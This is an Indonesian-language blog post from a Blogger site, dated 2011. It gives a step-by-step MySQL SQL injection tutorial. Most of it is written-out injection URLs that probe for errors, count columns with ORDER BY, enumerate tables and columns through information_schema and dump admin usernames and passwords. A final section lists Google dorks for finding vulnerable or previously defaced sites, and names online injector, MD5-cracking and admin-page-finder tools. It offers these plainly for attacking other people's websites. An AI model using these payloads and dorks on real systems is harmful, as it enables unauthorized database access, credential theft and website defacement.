Ekiosku.com jual beli online aman menyenangkan

sql

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x


===========

[+]step Satu:=
===========

carilah target

misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

contoh: [site]/berita.php?id=100' atau
[site]/berita.php?id=-100

sehingga muncul pesan error seperti berikut (masih bnyak lagi):



==========

[+]step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...

gunakan perintah : order by

contoh: [site]/berita.php?id=-100+order+by+1-- atau

[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...

misal: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...

misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8

menjadi [site]/berita.php?id=-100+order+by+8--


===========

[+]step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union

karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5


gunakan perintah version() atau @@version untuk mengecek

versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..


untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..



============

[+]step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah

perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--


seumpama table yang muncul adalah "admin"



===========

[+]step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah

perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--



=============

[+] step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi

perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--


pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya

website yg digunakan untuk konversi :

www.ascii-convert.co.cc


contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E


[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--



============

=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara


perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi

perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--



contoh kata yang keluar adalah id,username,password


[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--



==============

[+] step Delapan:=
==============

tahap terakhir mencari halam admin atau login
 
ga semua halaman web punya vurln inject'a... dgn kata lain ga semua hal web bisa di inject menggunakan sql injection..

misal lu udah punya target www.warungjamu.com untuk cari site vurln'a

coba lu search di google :
keyword'a :
allinurl:www.warungjamu.com
pada nongol ntu..
misal :http://www.warungjamu.com/index.php?&id=2
nah distu lu tambahin (') atau (-) diujung alamat webnya untuk melihat site ntu vurln sql apa ga'..
menjadi : http://www.warungjamu.com/index.php?&id=2'
atau : http://www.warungjamu.com/index.php?&id=-2
kalo ada pesan error berarti ntu web bisa di inject...

untuk mencari alamat web yang bisa di inject coba lu search di google pake dork ini


allinurl:"index.php?id="

allinurl:"page.php?id="
allinurl:"berita.php?id="
allinurl:"news.php?id="
allinurl:"index.php?"
allinurl:"index.asp?id="

note : lu bisa ganti2 ndiri keyword seskua lu sebelum .php?id="

contoh :
allinurl:" (kantor/perusahaan/shop/etc) .php?id="

kalo dork yang ini dork yang berhasih atau pernah diinject ma defacer sebelum'a lu masukin juga di google keyword neh :


inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()

yang keluar udah pasti ada pesan error (lumayan buat lu tester/belajar)...


dork yang ini beda lagi tapi masih tetep sama kea yang diatas, neh halaman yang pernah diinject defacer sebelumnya, lu tulis keyword neh di google


allinurl:group_concat(table_name)+from+information_schema.tables

disitu lu langsung dapet table yang di butuhin buat inject..

masih soal dork.. neh ada tools utk memudahkan lu mencari web yang bisa di inject..

http://ike.co.id/kagami.php


nah buat inject lu bisa pake tools online tapi ga semua web bisa.. maklum robot kan kadang oon juga xixixixixii...


kalo lu mau coba tools online lu bisa coba yang di sini

http://tools.kerinci.net/?x=injector

tetapi sebelumna lu harus cari dulu halaman web yang ada vurln'a sebelum menggunakan tool ntu..

untuk decript pass md 5 nya di mari :

http://tools.kerinci.net/?x=md5

atau
http://gdataonline.com/seekhash.php


utk mencari page admin'a (tempat lu login'a) lu pake ini :

http://th3-0utl4ws.com/tools/admin-finder/
 

 

Copyright © 2011 by Tutorial SEO - All Rights Reserved

Template by Blogger Templates | Powered by Blogger